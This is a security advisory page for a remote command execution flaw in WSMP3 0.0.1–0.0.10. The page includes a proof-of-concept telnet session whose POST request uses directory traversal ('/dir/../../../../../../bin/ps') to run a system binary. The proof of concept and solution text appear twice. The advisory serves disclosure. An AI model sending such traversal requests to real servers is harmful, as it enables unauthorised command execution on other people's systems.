WSMP3 Remote Command Execution Vulnerability
BID:7645
Info
WSMP3 Remote Command Execution Vulnerability
| Bugtraq ID: | 7645 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 21 2003 12:00AM |
| Updated: | May 21 2003 12:00AM |
| Credit: | The discovery of this vulnerability has been credited to "dong-h0un U" <[email protected]>. |
| Vulnerable: |
WSMP3 WSMP3 0.0.10 WSMP3 WSMP3 0.0.9 WSMP3 WSMP3 0.0.8 WSMP3 WSMP3 0.0.7 WSMP3 WSMP3 0.0.6 WSMP3 WSMP3 0.0.5 WSMP3 WSMP3 0.0.4 WSMP3 WSMP3 0.0.3 WSMP3 WSMP3 0.0.2 WSMP3 WSMP3 0.0.1 |
| Not Vulnerable: | |
Exploit / POC
WSMP3 Remote Command Execution Vulnerability
No exploit is required. However the following proof of concept POST request has been provided:
bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
No exploit is required. However the following proof of concept POST request has been provided:
bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
Solution / Fix
WSMP3 Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
WSMP3 Remote Command Execution Vulnerability
References:
References:
- WSMP3 Home Page (WSMP3)
- [INetCop Security Advisory] WsMP3d Directory Traversing Vulnerability. ("dong-h0un U"
)